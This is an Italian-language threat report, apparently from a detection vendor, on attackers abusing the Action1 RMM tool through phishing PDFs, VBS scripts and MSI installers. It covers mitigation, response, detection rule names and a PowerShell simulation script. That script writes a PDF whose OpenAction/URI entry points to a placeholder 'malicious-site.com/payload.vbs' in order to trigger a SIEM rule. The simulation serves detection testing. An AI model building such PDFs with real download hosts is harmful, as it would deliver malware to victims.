L’abuso degli strumenti RMM continua a crescere in campagne di minacce attive
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Gli attori delle minacce stanno abusando degli strumenti di Gestione e Monitoraggio da Remoto (RMM), in particolare Action1, per stabilire un accesso persistente all’interno degli ambienti compromessi. L’attacco inizia con un’email di phishing contenente un PDF malevolo che reindirizza le vittime a un file VBS. Lo script quindi scarica e installa un pacchetto MSI contenente l’agente Action1 legittimo, abilitando l’accesso remoto non autorizzato.
Indagine
L’indagine ha scoperto un PDF malevolo che sfrutta le parole chiave OpenAction e URI per iniziare un download da un URL ospitato su Vercel. L’analisi del pacchetto MSI recuperato ha rivelato file legittimi di Action1 Corporation utilizzati impropriamente tramite l’infrastruttura cloud del venditore stesso. L’agente installato contiene un CustomerID specifico e comunica con un dominio Action1 legittimo.
Mitigazione
Le organizzazioni dovrebbero configurare il filtraggio delle email per identificare strutture PDF sospette contenenti parole chiave OpenAction o URI. I team di sicurezza dovrebbero monitorare installazioni non autorizzate degli strumenti RMM e la creazione del servizio A1Agent. Bloccare le connessioni all’infrastruttura cloud RMM inaspettata e identificare CustomerID insoliti o non autorizzati può inoltre ridurre il rischio di abuso dell’accesso remoto.
Risposta
Quando viene rilevata un’attività RMM malevola, isolare l’host colpito per prevenire ulteriori esecuzioni di comandi remoti. Indagare sull’email di phishing originaria e condurre un’analisi forense del VBS associato e dei file MSI. Revocare le credenziali potenzialmente compromesse e rivedere le configurazioni dell’agente Action1 per indicatori di accesso remoto non autorizzato o persistenza.
Flusso di Attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
LOLBAS WScript / CScript (tramite process_creation)
Software di Accesso / Gestione Remoto Alternativo (tramite process_creation)
Possibile Infiltrazione / Esfiltrazione di Dati / C2 tramite Servizi / Strumenti di Terze Parti (tramite proxy)
Possibile Infiltrazione / Esfiltrazione di Dati / C2 tramite Servizi / Strumenti di Terze Parti (tramite dns)
Possibile Attività di Comando e Controllo mediante Tentativo di Comunicazione del Dominio di Software di Accesso Remoto (tramite dns)
IOC (HashSha256) da rilevare: Più Strumenti RMM Nella Natura
Connessione Remota ai Server Aziendali Action1 [Connessione di Rete di Windows]
PDF OpenAction e Reindirizzamento URI a VBS Malevolo [Evento File di Windows]
Esecuzione della Simulazione
-
Narrativa dell’Attacco & Comandi: L’avversario sta simulando una campagna di phishing. L’obiettivo è consegnare un file chiamato
Ricevuta di Transazione .pdfa una vittima. Il PDF è appositamente creato in modo tale che non appena l’utente lo apre, il comando/OpenActionattiva un/URIreindirizzamento. Questo reindirizzamento è progettato per portare l’utente a un sito che serve un VBScript malevolo. Per attivare la regola di rilevazione specifica fornita, creeremo un file con il nome esatto e le stringhe interne richieste. -
Script di Test di Regressione:
# Script di Simulazione: Attivazione del Rilevamento OpenAction del PDF $targetFile = "$env:USERPROFILEDesktopRicevuta di Transazione .pdf" # Creazione del contenuto PDF "malevolo" per corrispondere alle parole chiave di rilevazione $pdfContent = @" %PDF-1.1 1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >> endobj 2 0 obj << /Type /Pages /Parent 1 0 R /Count 1 >> endobj trailer << /Root 1 0 R >> %%EOF "@ # Scrittura del file su disco per attivare il rilevamento 'file_event' $pdfContent | Out-File -FilePath $targetFile -Encoding ascii Write-Host "File di simulazione creato in: $targetFile" Write-Host "Controlla il tuo SIEM per l'allerta di rilevamento." -
Comandi di Pulizia:
# Pulizia: Rimozione del file malevolo simulato $targetFile = "$env:USERPROFILEDesktopRicevuta di Transazione .pdf" if (Test-Path $targetFile) { Remove-Item -Path $targetFile -Force Write-Host "Pulizia completata: $targetFile rimosso." } else { Write-Host "Pulizia: File non trovato." }